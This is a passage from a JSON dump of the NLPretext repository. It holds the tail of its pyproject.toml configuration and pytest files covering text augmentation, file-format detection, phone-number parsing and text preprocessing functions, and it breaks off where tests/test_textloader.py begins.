\">=3.8,<3.11\"\ntyper = {extras = [\"all\"], version = \">=0.3.2\"}\nrich = \">=10.1\"\nchardet = \">=3.0.4\"\nemoji = \">=2.0.0\"\nflashtext = \">=2.7\"\nftfy = \">=4.2.0\"\nmosestokenizer = \">=1.1.0\"\nnlpaug = \">=1.0.1\"\nnltk = \">=3.4.2\"\nnumpy = \"^1.22\"\nphonenumbers = \">=8.10.12\"\nregex = \">=2019.8.19\"\nsacremoses = \">=0.0.13\"\nscikit-learn = \">=0.23.2, <2\"\nspacy = \">=3.0.5\"\npillow = \">=8.2.1\"\nthinc = \">=8.0.4\"\nstop-words = \">=2018.7.23\"\npandas = \">=1.3,<3.0\"\npyarrow = \">=4.0.0\"\nfastparquet = \">=0.4.1\"\ndask = {version = \">=2021.5.0\", extras = [\"complete\"], optional = true}\ndistributed = {version = \">=2021.5.0\", extras = [\"complete\"], optional = true}\ntornado = \">=6.0.3\"\ntorch = {version = \"^1.9.0\", optional = 
true}\n\n[tool.poetry.group.dev.dependencies]\nisort = \">=5.8.0\"\npyupgrade = \">=2.12.0\"\nblack = \">=20.8b1\"\nruff = \"^0.1.5\"\nmypy = \">=0.812\"\nbandit = \">=1.7.0\"\nsafety = \">=1.10.3\"\npytest = \">=6.2.1\"\npytest-cov = \">=2.10.1\"\ncoverage = \">=5.3\"\npre-commit = \">=2.12.0\"\nmypy-extensions = \">=0.4.3\"\ntypes-emoji = \">=1.2.2\"\ntypes-chardet = \">=0.1.3\"\ntypes-click = \">=7.1.2\"\n\n\n[tool.poetry.group.docs.dependencies]\nnbsphinx = \">=0.8.0\"\nnotebook = \">=6.1.5\"\nPygments = \">=2.8.0\"\nrecommonmark=\">=0.7.1\"\nSphinx = \">=3.5.4\"\nsphinx-gallery = \">=0.8.1\"\nsphinxcontrib-applehelp = \">=1.0.2\"\nsphinxcontrib-devhelp = \">=1.0.2\"\nsphinxcontrib-htmlhelp = \">=1.0.3\"\nsphinxcontrib-jsmath = \">=1.0.1\"\nsphinxcontrib-qthelp = \">=1.0.3\"\nsphinxcontrib-serializinghtml = \">=1.1.4\"\nsphinx-autodoc-typehints = \">=1.11.1\"\nsphinx_rtd_theme = \">=0.5.2\"\nsphinx-multiversion-pre-post-build = \">=0.2.4\"\n\n\n[tool.poetry.extras]\ntorch = [\"torch\"]\ndask = [\"dask\", \"distributed\"]\n\n[tool.black]\n# https://github.com/psf/black\nline-length = 100\ntarget-version = [\"py38\"]\n\n[tool.isort]\n# https://github.com/timothycrosley/isort/\nprofile = \"black\"\nknown_typing = \"typing,types,typing_extensions,mypy,mypy_extensions\"\nsections = \"FUTURE,TYPING,STDLIB,THIRDPARTY,FIRSTPARTY,LOCALFOLDER\"\ndefault_section = \"FIRSTPARTY\"\nforce_grid_wrap = 0\nline_length = 100\n\n\n[tool.ruff]\nignore = [\n    \"D100\",\n    \"D101\",\n    \"D106\",\n    \"D205\",\n    \"D400\",\n    \"D415\",\n    \"D401\",\n]\nline-length = 100\nselect = [\"B\", \"C\", \"D\", \"E\", \"F\", \"W\"]\n\n[tool.ruff.pydocstyle]\nconvention = \"numpy\"\n\n[tool.ruff.per-file-ignores]\n\"*cli.py\" = [\"D\", \"B008\"]\n\"*__init__.py\" = [\n    \"F401\",\n    \"D100\",\n    \"D101\",\n    \"D103\",\n    \"D104\",\n    \"D105\",\n    \"D106\",\n    \"D107\",\n]\n\"tests/*\" = [\"D\", \"E501\"]\n"
  },
  {
    "path": "references/.gitkeep",
    "content": ""
  },
  {
    "path": "tests/__init__.py",
    "content": ""
  },
  {
    "path": "tests/test_data_augmentation.py",
    "content": "import pytest\nfrom nlpretext.augmentation.text_augmentation import (\n    CouldNotAugment,\n    UnavailableAugmenter,\n    get_augmenter,\n    process_entities_and_text,\n)\n\n\n@pytest.mark.parametrize(\n    \"text, text_augmented, entities, expected\",\n    [\n        (\n            \"I want to buy a small black handbag.\",\n            \"I want to acquire a small black handbag\",\n            [\n                {\"entity\": \"Size\", \"word\": \"small\", \"startCharIndex\": 16, \"endCharIndex\": 21},\n                {\"entity\": \"Color\", \"word\": \"black\", \"startCharIndex\": 22, \"endCharIndex\": 27},\n                {\"entity\": \"Type\", \"word\": \"handbag\", \"startCharIndex\": 28, \"endCharIndex\": 35},\n            ],\n            {\"type\": str, \"entities\": [\"black\", \"handbag\", \"small\"]},\n        ),\n        (\n            \"I want to buy a small black handbag.\",\n            \"I would like to buy a black small handbag\",\n            [\n                {\"entity\": \"Size\", \"word\": \"small\", \"startCharIndex\": 16, \"endCharIndex\": 21},\n                {\"entity\": \"Color\", \"word\": \"black\", \"startCharIndex\": 22, \"endCharIndex\": 27},\n                {\"entity\": \"Type\", \"word\": \"handbag\", \"startCharIndex\": 28, \"endCharIndex\": 35},\n            ],\n            {\"type\": str, \"entities\": [\"black\", \"handbag\", \"small\"]},\n        ),\n    ],\n)\ndef test_process_entities_and_text_not_altered(text, text_augmented, entities, expected):\n    augmented_text, augmented_entities = process_entities_and_text(entities, text, text_augmented)\n    augmented_entities = sorted(el[\"word\"] for el in augmented_entities)\n    assert {\"type\": type(augmented_text), \"entities\": augmented_entities} == expected\n\n\n@pytest.mark.parametrize(\n    \"text, text_augmented, entities\",\n    [\n        (\n            \"I live in New York and I am looking for a lipstick\",\n            \"I live in New and York I 
an looking for a lipstick\",\n            [\n                {\"entity\": \"City\", \"word\": \"New York\", \"startCharIndex\": 10, \"endCharIndex\": 18},\n                {\"entity\": \"Type\", \"word\": \"bag\", \"startCharIndex\": 42, \"endCharIndex\": 50},\n            ],\n        )\n    ],\n)\ndef test_process_entities_and_text_altered(text, text_augmented, entities):\n    with pytest.raises(CouldNotAugment) as excinfo:\n        process_entities_and_text(entities, text, text_augmented)\n    assert (\n        str(excinfo.value) == \"Text was not correctly augmented because entities were altered\"\n    )\n\n\ndef test_get_augmenter():\n    method = \"ppdb_synonym\"\n    with pytest.raises(UnavailableAugmenter) as excinfo:\n        get_augmenter(method)\n    assert (\n        str(excinfo.value)\n        == \"The given augmenter is not supported. You must choose one \\\n               of the following: wordnet_synonym or aug_sub_bert\"\n    )\n"
  },
  {
    "path": "tests/test_file_loader.py",
    "content": "# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License\n\nimport os\nimport re\n\nimport numpy as np\nimport pytest\nfrom nlpretext._utils.file_loader import check_text_file_format, detect_encoding\n\nTESTDOC_LATIN1 = \"J'aime les frites bien grasse étalon châpeau!\"\nTESTDOC_UTF8 = \"Un deuxième exemple de texte en utf-8 cette fois!\"\n\n\ndef create_files():\n    encoded_s = TESTDOC_LATIN1.encode(\"latin-1\")\n    with open(\"testdoc_latin1.txt\", \"wb\") as f:\n        f.write(encoded_s)\n\n    encoded_s = TESTDOC_UTF8.encode(\"utf-8\")\n    with open(\"testdoc_utf8.txt\", \"wb\") as f:\n        f.write(encoded_s)\n    return True\n\n\ndef test_detect_encoding():\n    create_files()\n    expected = {\"encoding\": \"ISO-8859-1\", \"confidence\": 0.73, \"language\": \"\"}\n    result = detect_encoding(\"testdoc_latin1.txt\")\n    np.testing.assert_equal(result, expected)\n    remove_files()\n\n\ndef remove_files():\n    os.remove(\"testdoc_latin1.txt\")\n    os.remove(\"testdoc_utf8.txt\")\n\n\n@pytest.mark.parametrize(\n    \"input_filepath, raising, expected_str\",\n    [\n        (\"hello.csv\", False, \"csv\"),\n        (\"folder/hello.csv\", False, \"csv\"),\n        (\"gs://folder/hello.csv\", False, \"csv\"),\n        (\"s3://folder/hello.csv\", False, \"csv\"),\n        (\"hdfs://folder/hello.csv\", False, \"csv\"),\n        (\"az://folder/hello.csv\", False, \"csv\"),\n        
(\"wildcards/*.csv\", False, \"csv\"),\n        (\"compressed/gz/text.csv.gz\", False, \"csv\"),\n        (\"compressed/zip/text.csv.zip\", False, \"csv\"),\n        ([\"hello.csv\"], False, \"csv\"),\n        ([\"hello.csv\", \"compressed.csv.gz\"], False, \"csv\"),\n        ([\"hello.csv\", \"other/folder/hello.csv\"], False, \"csv\"),\n        (\"hello.json\", False, \"json\"),\n        (\"folder/hello.json\", False, \"json\"),\n        (\"gs://folder/hello.json\", False, \"json\"),\n        ([\"hello.json\", \"folder/hello.json\"], False, \"json\"),\n        (\"hello.txt\", False, \"txt\"),\n        (\"folder/hello.txt\", False, \"txt\"),\n        (\"gs://folder/hello.txt\", False, \"txt\"),\n        ([\"hello.txt\", \"gs://folder/hello.txt\"], False, \"txt\"),\n        (\"hello.parquet\", False, \"parquet\"),\n        (\"folder/hello.parquet\", False, \"parquet\"),\n        (\"gs://folder/hello.parquet\", False, \"parquet\"),\n        ([\"hello.parquet\", \"gs://folder/hello.parquet\"], False, \"parquet\"),\n        (\n            \"gs://folder/hello.notaformat\",\n            True,\n            \"Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted\",\n        ),\n        (\n            \"gs://folder/hello.gz\",\n            True,\n            \"Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted\",\n        ),\n        (\n            \"gs://folder/hello.zip\",\n            True,\n            \"Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted\",\n        ),\n        (\n            \"folder/*\",\n            True,\n            \"Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted\",\n        ),\n        (\n            [\"hello.txt\", \"gs://folder/hello.csv\"],\n            True,\n            re.escape(\"Multiple file formats found in file path list: ['txt', 'csv']\"),\n        ),\n    ],\n)\ndef 
test_check_text_file_format(input_filepath, raising, expected_str):\n    if raising:\n        with pytest.raises(ValueError, match=expected_str):\n            check_text_file_format(input_filepath)\n    else:\n        result = check_text_file_format(input_filepath)\n        assert result == expected_str\n"
  },
  {
    "path": "tests/test_phone_number.py",
    "content": "# GNU Lesser General Public License v3.0 only\n# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 3 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.\nimport nlpretext._utils.phone_number as phone\nfrom nlpretext._config.config import SUPPORTED_COUNTRY\n\n\ndef test_extract_phone_number():\n    input_str = \"(541) 754-3010 is a US. Phone\"\n    expected = [\"(541) 754-3010\", \"754-3010\"]\n    res = phone.extract_phone_numbers(input_str, countrylist=SUPPORTED_COUNTRY)\n    assert sorted(res) == sorted(expected)\n\n\ndef test_extract_phone_number_us():\n    input_str = \"(541) 754-3010 is a US. 
Phone\"\n    expected = [\"(541) 754-3010\"]\n    res = phone.extract_phone_numbers(input_str, countrylist=[\"US\"])\n    assert res == expected\n\n\ndef test_extract_phone_number_fr():\n    input_str = \"06.00.00.00.00 is a FR Phone\"\n    expected = [\"06.00.00.00.00\"]\n    res = phone.extract_phone_numbers(input_str, countrylist=[\"FR\"])\n    assert res == expected\n\n\ndef test_extract_phone_number_international():\n    input_str = \"+33600000000 is an international Phone number\"\n    expected = [\"+33600000000\"]\n    res = phone.extract_phone_numbers(input_str, countrylist=[\"US\", \"GB\", \"FR\", None])\n    assert res == expected\n\n\ndef test_phone_parser_us():\n    input_str = \"(541) 754-3010\"\n    expected = \"+1 541-754-3010\"\n    p = phone.PhoneParser()\n    p.parse_number(input_str, region_code=\"US\")\n    res = p.format_number(\"INTERNATIONAL\")\n    assert res == expected\n\n\ndef test_phone_parser_fr():\n    input_str = \"0600000000\"\n    expected = \"+33600000000\"\n    p = phone.PhoneParser()\n    p.parse_number(input_str, region_code=\"FR\")\n    res = p.format_number(\"E164\")\n    assert res == expected\n"
  },
  {
    "path": "tests/test_preprocessor.py",
    "content": "# GNU Lesser General Public License v3.0 only\n# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 3 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.\n\n\nimport numpy as np\nimport pytest\nfrom nlpretext._config.config import SUPPORTED_COUNTRY\nfrom nlpretext._utils.stopwords import get_stopwords\nfrom nlpretext.basic.preprocess import (\n    filter_non_latin_characters,\n    fix_bad_unicode,\n    normalize_whitespace,\n    remove_accents,\n    remove_eol_characters,\n    remove_multiple_spaces_and_strip_text,\n    remove_punct,\n)\nfrom nlpretext.basic.preprocess import remove_stopwords as remove_stopwords_text\nfrom nlpretext.basic.preprocess import (\n    replace_currency_symbols,\n    replace_emails,\n    replace_numbers,\n    replace_phone_numbers,\n    replace_urls,\n    unpack_english_contractions,\n)\nfrom nlpretext.preprocessor import Preprocessor\nfrom nlpretext.social.preprocess import (\n    convert_emoji_to_text,\n    extract_emojis,\n    extract_hashtags,\n    extract_mentions,\n    remove_emoji,\n    remove_hashtag,\n    remove_html_tags,\n    remove_mentions,\n)\nfrom nlpretext.token.preprocess import remove_smallwords, remove_special_caracters_from_tokenslist\nfrom nlpretext.token.preprocess import remove_stopwords as 
remove_stopwords_token\nfrom nlpretext.token.preprocess import remove_tokens_with_nonletters\n\n\n@pytest.mark.parametrize(\n    \"text, expected_result\",\n    [\n        (\"ACV water + cinnamon + turmeric + cucumber + lemon. 👍🏻\", [\":thumbs_up_light_skin_tone:\"]),\n        (\"This is a text without emojis\", []),\n    ],\n)\ndef test_extract_emojis(text, expected_result):\n    result = extract_emojis(text)\n    assert expected_result == result\n\n\n@pytest.mark.parametrize(\n    \"text, expected_result\",\n    [\n        (\"I take care of my skin with @hellobody\", \"I take care of my skin with\"),\n        (\"This is a text without mentions\", \"This is a text without mentions\"),\n    ],\n)\ndef test_remove_mentions(text, expected_result):\n    result = remove_mentions(text)\n    assert expected_result == result\n\n\n@pytest.mark.parametrize(\n    \"text, expected_result\",\n    [\n        (\"I take care of my skin with @hellobody\", [\"@hellobody\"]),\n        (\"This is a text without mentions\", []),\n    ],\n)\ndef test_extract_mentions(text, expected_result):\n    result = extract_mentions(text)\n    assert expected_result == result\n\n\n@pytest.mark.parametrize(\n    \"text, expected_result\",\n    [\n        (\n            \"This is a text with <html> content of html tag </html>\",\n            \"This is a text with content of html tag\",\n        ),\n        (\"This is a text without html tags\", \"This is a text without html tags\"),\n    ],\n)\ndef test_remove_html_tags(text, expected_result):\n    result = remove_html_tags(text)\n    assert expected_result == result\n\n\n@pytest.mark.parametrize(\n    \"tokens_list, smallwords_threshold, expected_result\",\n    [\n        ([\"I\", \"take\", \"care\", \"of\", \"my\", \"skin\"], 2, [\"take\", \"care\", \"skin\"]),\n        (\n            [\"This\", \"text\", \"contains\", \"only\", \"long\", \"words\"],\n            2,\n            [\"This\", \"text\", \"contains\", \"only\", \"long\", \"words\"],\n  
      ),\n    ],\n)\ndef test_remove_smallwords(tokens_list, smallwords_threshold, expected_result):\n    result = remove_smallwords(tokens_list, smallwords_threshold)\n    assert expected_result == result\n\n\n@pytest.mark.parametrize(\n    \"text, expected_result\",\n    [\n        (\"this is a #hashtag in the middle of the text\", [\"#hashtag\"]),\n        (\"#this is a hashtag in the beginning of the text\", [\"#this\"]),\n        (\"this is a hashtag in the end of the #text\", [\"#text\"]),\n        (\"this is a text with no hashtag\", []),\n        (\"this is a text with #many #hashtags\", [\"#many\", \"#hashtags\"]),\n    ],\n)\ndef test_extract_hashtags(text, expected_result):\n    result = extract_hashtags(text)\n    assert expected_result == result\n\n\n@pytest.mark.parametrize(\n    \"text, expected_result\",\n    [\n        (\"this is a #hashtag in the middle of the text\", \"this is a in the middle of the text\"),\n        (\n            \"#this is a hashtag in the beginning of the text\",\n            \"is a hashtag in the beginning of the text\",\n        ),\n        (\"this is a hashtag in the end of the #text\", \"this is a hashtag in the end of the\"),\n        (\"this is a text with no hashtag\", \"this is a text with no hashtag\"),\n        (\"this is a text with #many #hashtags\", \"this is a text with\"),\n    ],\n)\ndef test_remove_hashtag(text, expected_result):\n    result = remove_hashtag(text)\n    assert expected_result == result\n\n\n@pytest.mark.parametrize(\n    \"text, expected_filtered_text\",\n    [\n        (\n            \"كلمات Learn 3 Arabic كلمات words EASILY- Vocabulary #1 تعلم ٣ جديدة\",\n            \"Learn 3 Arabic words EASILY Vocabulary 1\",\n        )\n    ],\n)\ndef test_filter_non_latin_characters(text, expected_filtered_text):\n    result = filter_non_latin_characters(text)\n    assert expected_filtered_text == result\n\n\n@pytest.mark.parametrize(\n    \"input_str, expected_str\",\n    [\n        (\"hello   world\", 
\"hello world\"),\n        (\"\\n   hello world    \", \"hello world\"),\n        (\"----- hello\\tworld *****\", \"hello world\"),\n        (\"hello-world\", \"hello-world\"),\n        (\"hello - world\", \"hello world\"),\n    ],\n)\ndef test_remove_multiple_spaces_and_strip_text(input_str, expected_str):\n    result = remove_multiple_spaces_and_strip_text(input_str)\n    np.testing.assert_string_equal(result, expected_str)\n\n\n@pytest.mark.parametrize(\n    \"input_str, expected_str\",\n    [\n        (\"\\nhello world\", \" hello world\"),\n        (\"hello\\nworld\", \"hello world\"),\n        (\"hello world\\n\", \"hello world \"),\n    ],\n)\ndef test_remove_eol_characters(input_str, expected_str):\n    result = remove_eol_characters(input_str)\n    np.testing.assert_string_equal(result, expected_str)\n\n\ndef test_remove_tokens_with_nonletters():\n    input_tokens = [\"foo\", \"bar\", \"124\", \"34euros\"]\n    expected_output = [\"foo\", \"bar\"]\n    result = remove_tokens_with_nonletters(input_tokens)\n    np.testing.assert_array_equal(result, expected_output)\n\n\ndef test_remove_special_caracters_from_tokenslist():\n    input_tokens = [\"foo\", \"bar\", \"---\", \"'s\", \"#\"]\n    expected_output = [\"foo\", \"bar\", \"'s\"]\n    result = remove_special_caracters_from_tokenslist(input_tokens)\n    np.testing.assert_array_equal(result, expected_output)\n\n\ndef test_get_stopwords():\n    languages_to_test = [\"fr\", \"en\", \"ga\", \"zh\"]\n    for lang in languages_to_test:\n        result = get_stopwords(lang)\n        assert len(result) > 0 and isinstance(result, list)\n\n\n@pytest.mark.parametrize(\n    \"input_tokens, lang, expected_output\",\n    [([\"I\", \"like\", \"this\", \"song\", \"very\", \"much\", \"!\"], \"en\", [\"I\", \"song\", \"!\"])],\n)\ndef test_remove_stopwords_tokens(input_tokens, lang, expected_output):\n    result = remove_stopwords_token(input_tokens, lang)\n    np.testing.assert_array_equal(result, 
expected_output)\n\n\n@pytest.mark.parametrize(\n    \"input_text, lang, custom_stopwords, ignored_stopwords, expected_output\",\n    [\n        (\"I like this song very much !\", \"en\", None, None, \"I song !\"),\n        (\"Can I get a beer?\", \"en\", None, None, \"Can I beer ?\"),\n        (\"Je vous recommande ce film !\", \"fr\", None, None, \"Je recommande film !\"),\n        (\"je vous recommande ce film !\", \"fr\", None, None, \"recommande film !\"),\n        (\"Quiero una cerveza, por favor.\", \"es\", None, None, \"Quiero cerveza, favor.\"),\n        (\"je vous recommande ce film !\", \"fr\", [\"recommande\"], None, \"film !\"),\n        (\"Quiero una cerveza, por favor.\", \"es\", None, [\"una\"], \"Quiero una cerveza, favor.\"),\n        (\"je vous recommande ce film !\", \"fr\", [\"recommande\"], [\"je vous\"], \"je vous film !\"),\n        (\n            \"je vous recommande ce film !\",\n            \"fr\",\n            [\"recommande\"],\n            [\"recommande ce film\"],\n            \"recommande ce film !\",\n        ),\n    ],\n)\ndef test_remove_stopwords_text(\n    input_text, lang, custom_stopwords, ignored_stopwords, expected_output\n):\n    result = remove_stopwords_text(input_text, lang, custom_stopwords, ignored_stopwords)\n    np.testing.assert_array_equal(result, expected_output)\n\n\n@pytest.mark.parametrize(\n    \"input_text, lang, custom_stopwords, expected_output\",\n    [\n        (\"I like this song very much !\", \"en\", [\"song\"], \"I !\"),\n        (\n            \"Je vous recommande ce film la scène de fin est géniale !\",\n            \"fr\",\n            [\"film\", \"scène\"],\n            \"Je recommande fin géniale !\",\n        ),\n    ],\n)\ndef test_remove_custom_stopwords_text(input_text, lang, custom_stopwords, expected_output):\n    result = remove_stopwords_text(input_text, lang, custom_stopwords)\n    np.testing.assert_array_equal(result, expected_output)\n\n\ndef test_remove_accents():\n    input_str = 
\"éèëêàù\"\n    expected_str = \"eeeeau\"\n    result = remove_accents(input_str)\n    np.testing.assert_string_equal(result, expected_str)\n\n\n@pytest.mark.parametrize(\n    \"input_str, expected_str\",\n    [\n        (\"Les augmentations de rÃ©munÃ©rations\", \"Les augmentations de rémunérations\"),\n        (\n            \"rÃ©nover l'enquÃªte publique pour en faire un vrai outil  d'amÃ©nagement du territoire et de dialogue social\",\n            \"rénover l'enquête publique pour en faire un vrai outil  d'aménagement du territoire et de dialogue social\",\n        ),\n        (\n            \"Limitations de vitesse et sÃ©curitÃ© routiÃ¨re\",\n            \"Limitations de vitesse et sécurité routière\",\n        ),\n        (\"Pour un nouveau contrat citoyen\", \"Pour un nouveau contrat citoyen\"),\n        (\n            \"DÃ©velopper les dÃ©marches de budget participatif dans les collectivitÃ©s et associer les citoyens\"\n            \" dans la rÃ©alisation des projets\",\n            \"Développer les démarches de budget participatif dans les collectivités et associer les citoyens\"\n            \" dans la réalisation des projets\",\n        ),\n        (\"proportienelle\", \"proportienelle\"),\n        (\"Pour plus de dÃ©mocratie participative\", \"Pour plus de démocratie participative\"),\n        (\"Transparence de la vie public\", \"Transparence de la vie public\"),\n        (\"EgalitÃ© devant les infractions routiÃ¨res\", \"Egalité devant les infractions routières\"),\n    ],\n)\ndef test_fix_bad_unicode(input_str, expected_str):\n    result = fix_bad_unicode(input_str)\n    np.testing.assert_string_equal(result, expected_str)\n\n\n@pytest.mark.parametrize(\n    \"input_str, expected_str\",\n    [(\"  foo  \", \"foo\"), (\"  foo   bar  \", \"foo bar\")],\n)\ndef test_normalize_whitespace(input_str, expected_str):\n    result = normalize_whitespace(input_str)\n    np.testing.assert_equal(result, expected_str)\n\n\n@pytest.mark.parametrize(\n    
\"input_str, expected_str\",\n    [\n        (\"I can't tell how we've done.\", \"I can not tell how we have done.\"),\n        (\"You're fired. She's nice.\", \"You are fired. She's nice.\"),\n        (\"Let's go!\", \"Let us go!\"),\n        (\"You've been missing\", \"You have been missing\"),\n        (\"I'm sure you're leaving\", \"I am sure you are leaving\"),\n        (\"We'll survive.\", \"We will survive.\"),\n    ],\n)\ndef test_unpack_english_contractions(input_str, expected_str):\n    result = unpack_english_contractions(input_str)\n    np.testing.assert_equal(result, expected_str)\n\n\n@pytest.mark.parametrize(\n    \"input_str, expected_str\",\n    [\n        (\n            \"Wan't to contribute to NLPretext? read https://github.com/artefactory/NLPretext/blob/master/CONTRIBUTING.md\"\n            \" first\",\n            \"Wan't to contribute to NLPretext? read *URL* first\",\n        ),\n        (\n            \"If you go to http://internet.org, you will find a website hosted by FB.\",\n            \"If you go to *URL*, you will find a website hosted by FB.\",\n        ),\n        (\"Ishttps://internet.org/ available?\", \"Is*URL* available?\"),\n        (\"mailto:john.doe@artefact.com\", \"*URL*\"),\n    ],\n)\ndef test_replace_urls(input_str, expected_str):\n    result = replace_urls(input_str)\n    np.testing.assert_equal(result, expected_str)\n\n\n@pytest.mark.parametrize(\n    \"input_str, expected_str\",\n    [\n        (\"my email:john.doe@artefact.com\", \"my email:*EMAIL*\"),\n        (\"v543143@nwytg.net is a temporary email\", \"*EMAIL* is a temporary email\"),\n        (\"our emails used to be name.surname@artefact.is\", \"our emails used to be *EMAIL*\"),\n    ],\n)\ndef test_replace_emails(input_str, expected_str):\n    result = replace_emails(input_str)\n    np.testing.assert_equal(result, expected_str)\n\n\n@pytest.mark.parametrize(\n    \"input_str, expected_str\",\n    [\n        (\"mon 06: 0601020304\", \"mon 06: *PHONE*\"),\n      
  (\"mon 06: 06.01.02.03.04\", \"mon 06: *PHONE*\"),\n        (\"call me at +33601020304\", \"call me at *PHONE*\"),\n        (\"call me at +33 6 01 02 03 04\", \"call me at *PHONE*\"),\n        (\"call me at +33 601 020 304\", \"call me at *PHONE*\"),\n        (\n            \"if this unit test doesn't work, call 3615 and says 'HELP'\",\n            \"if this unit test doesn't work, call *PHONE* and says 'HELP'\",\n        ),\n        (\"(541) 754-0000 is a US. Phone\", \"*PHONE* is a US. Phone\"),\n        (\"+1-541-754-0000 is an international Phone\", \"*PHONE* is an international Phone\"),\n        (\"+1-541-754-0000 Dialed in the US\", \"*PHONE* Dialed in the US\"),\n        (\"+1-541-754-0000 Dialed from Germany\", \"*PHONE* Dialed from Germany\"),\n    ],\n)\ndef test_replace_phone_numbers(input_str, expected_str):\n    result = replace_phone_numbers(\n        input_str,\n        replace_with=\"*PHONE*\",\n        method=\"detection\",\n        country_to_detect=SUPPORTED_COUNTRY,\n    )\n    np.testing.assert_equal(result, expected_str)\n\n\n@pytest.mark.parametrize(\n    \"input_str, expected_str\",\n    [\n        (\"123, 3 petits chats\", \"*NUMBER*, *NUMBER* petits chats\"),\n        (\"Give me 45bucks!\", \"Give me *NUMBER*bucks!\"),\n        (\"call me at +33601020304\", \"call me at *NUMBER*\"),\n    ],\n)\ndef test_replace_numbers(input_str, expected_str):\n    result = replace_numbers(input_str)\n    np.testing.assert_equal(result, expected_str)\n\n\n@pytest.mark.parametrize(\n    \"input_str, param, expected_str\",\n    [\n        (\"Give me 23$\", None, \"Give me 23USD\"),\n        (\"Give me 23£\", None, \"Give me 23GBP\"),\n        (\"Give me 23 £\", None, \"Give me 23 GBP\"),\n        (\"Give me 23 €\", None, \"Give me 23 EUR\"),\n        (\n            \"¥ is both japanese yen and Chinese Renminbi\",\n            \"*CUR*\",\n            \"*CUR* is both japanese yen and Chinese Renminbi\",\n        ),\n    ],\n)\ndef 
test_replace_currency_symbols(input_str, param, expected_str):\n    result = replace_currency_symbols(input_str, replace_with=param)\n    np.testing.assert_equal(result, expected_str)\n\n\n@pytest.mark.parametrize(\n    \"input_str, param, expected_str\",\n    [\n        (\"Seriously...\", None, \"Seriously   \"),\n        (\"Seriously?\", None, \"Seriously \"),\n        (\"Seriously ?\", None, \"Seriously  \"),\n        (\"Seriously???\", None, \"Seriously   \"),\n        (\"Seriously?!\", None, \"Seriously  \"),\n        ('\"Seriously\"', None, \" Seriously \"),\n        (\"Seriously:\", None, \"Seriously \"),\n        (\"Seriously;\", None, \"Seriously \"),\n        (\"'Seriously'\", None, \" Seriously \"),\n        (\"'Seriously'\", \".,;\", \"'Seriously'\"),\n        (\"Seriously.,.\", \".,;\", \"Seriously \"),\n        (\"Seriously...\", \".,;\", \"Seriously \"),\n        (\"Seriously.!.\", \".,;\", \"Seriously ! \"),\n        (\"john.doe@artefact.com\", \".,;\", \"john doe@artefact com\"),\n        (\"john.doe@artefact.com\", None, \"john doe artefact com\"),\n        (\"john-doe@artefact.com\", None, \"john doe artefact com\"),\n    ],\n)\ndef test_remove_punct(input_str, param, expected_str):\n    result = remove_punct(input_str, marks=param)\n    np.testing.assert_equal(result, expected_str)\n\n\n@pytest.mark.parametrize(\n    \"input_str, expected_str\",\n    [\n        (\"⚽👌\", \"\"),\n        (\"🎅🏿⌚\", \"\"),\n        (\"🥖🍷🇫🇷\", \"\"),\n        (\"✊\", \"\"),\n        (\"Save 🐼 and 🐟\", \"Save  and \"),\n    ],\n)\ndef test_remove_emoji(input_str, expected_str):\n    result = remove_emoji(input_str)\n    assert len(result) == len(expected_str)\n    assert result == expected_str\n\n\n@pytest.mark.parametrize(\n    \"input_str, expected_str\",\n    [\n        (\"⚽️👌\", \":soccer_ball::OK_hand:\"),\n        (\"🎅🏿⌚\", \":Santa_Claus_dark_skin_tone::watch:\"),\n        (\"🥖🍷🇫🇷\", \":baguette_bread::wine_glass::France:\"),\n        (\"✊\", 
\":raised_fist:\"),\n    ],\n)\ndef test_convert_emoji_to_text(input_str, expected_str):\n    result = convert_emoji_to_text(input_str)\n    np.testing.assert_equal(result, expected_str)\n\n\ndef test_custom_preprocess():\n    # Given\n    text = \"Some text with @mentions and #hashtags\"\n\n    preprocessor = Preprocessor()\n    preprocessor.pipe(remove_hashtag)\n    preprocessor.pipe(remove_mentions)\n    expected_result = remove_hashtag(text)\n    expected_result = remove_mentions(expected_result)\n\n    # When\n    result = preprocessor.run(text)\n\n    # Then\n    assert expected_result == result\n\n\n@pytest.mark.parametrize(\n    \"input_str, expected_str\",\n    [\n        (\n            \"Some text with @mentions and whitespaces    and #hashtags\",\n            \"Some text with and whitespaces and\",\n        ),\n        (\"@twitteruser ✊\", \"\"),\n        (\"\", \"\"),\n    ],\n)\ndef test_apply_preprocessor(input_str, expected_str):\n    # Given\n    preprocessor = Preprocessor()\n\n    # When\n    result = preprocessor.run(input_str)\n\n    # Then\n    assert expected_str == result\n"
  },
  {
    "path": "tests/test_textloader.py",
